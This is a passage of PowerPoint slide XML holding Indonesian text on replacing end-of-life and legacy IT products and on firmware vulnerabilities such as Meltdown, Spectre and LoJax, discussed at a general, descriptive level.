              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keandalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EOL dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lawas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sangatlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penggantian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EOL dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lawas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>migrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>andal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kriteria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor, detail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>garansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pasar. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cermat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lisensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profesional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Upaya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beralih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EOL dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberlanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Firmware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Firmware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Meltdown dan Spectre yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2018 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hampir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>LoJax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>," yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware Unified Extensible Firmware Interface (UEFI) pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2018, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
